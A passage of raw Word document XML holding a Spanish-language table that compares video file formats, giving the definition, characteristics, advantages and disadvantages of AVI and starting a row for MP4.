          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="007F0A48" w:rsidP="007F0A48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00FF41F2" w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>efinición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="007F0A48" w:rsidP="007F0A48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="00FF41F2" w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>aracterísticas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="007F0A48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Ventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="007F0A48" w:rsidP="007F0A48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00FF41F2" w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>esventajas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C25E12" w:rsidRPr="007F0A48" w:rsidTr="006561C1">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="996" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA3E6B" w:rsidRDefault="00FA3E6B" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>AVI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>27940</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1134669</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1057275" cy="1057275"/>
                  <wp:effectExtent l="0" t="0" r="0"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990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="003926BC">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Los archivos AVI fueron desarrollados por Microsoft con la intención de almacenar datos de audio y video en un solo archivo. La </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>abreviatura de AVI es Audio Video Interleave. Es una extensión de archivo que tiene la capacidad de almacenar datos de audio y video en un solo archivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Contiene vídeo con muy buena calidad.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Una de sus mayores desventajas es que el peso de los archivos siempre es </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>muy elevado, lo que hace que los vídeos en este formato no sean aptos para colgarlos en Internet.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Se puede visualizar con la mayoría de reproductores en un ordenador tanto Windows como Mac, siempre y cuando estén instalados los códecs de vídeo y audio </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>para cada tipo de reproductor.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Generalmente, los códecs que tienen una mayor capacidad de compresión y una calidad bastante buena son DivX y XviD; se suelen utilizar para vídeos de larga duración como películas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Es un formato que se utiliza mucho para guardar vídeos </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>originales que han sido capturados con una cámara digital.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Para almacenar discos DVD y discos, puede crearlos fácilmente en formato de archivo AVI.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">El formato de archivo AVI tiene </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>una muy buena calidad de fidelidad de audio</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Los anuncios, promociones y películas cortas generalmente recurren a formatos de archivo AVI debido a su mayor capacidad de compresión.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">No requiere un dispositivo de hardware específico o una aplicación de software para </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ejecutar el archivo.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Debido a la disponibilidad de muchos códecs, es muy fácil obtener la relación de compresión requerida del formato AVI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Comprimir archivos AVI más allá de cierto grado puede resultar en mala calidad o pérdida de calidad del video.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Si desea recuperar y reproducir el </w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>archivo, tendrá que utilizar el mismo códec que utilizó, entonces necesitará el mismo códec para instalar en el sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00C25E12" w:rsidRDefault="00FF41F2" w:rsidP="00C25E12">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Los archivos AVI pueden ser formatos de archivo</w:t>
            </w:r>
            <w:r w:rsidR="003926BC" w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00C25E12">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> muy grandes si no los comprime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C25E12" w:rsidRPr="007F0A48" w:rsidTr="006561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6" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MP4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="dxa"/>
          </w:tcPr>
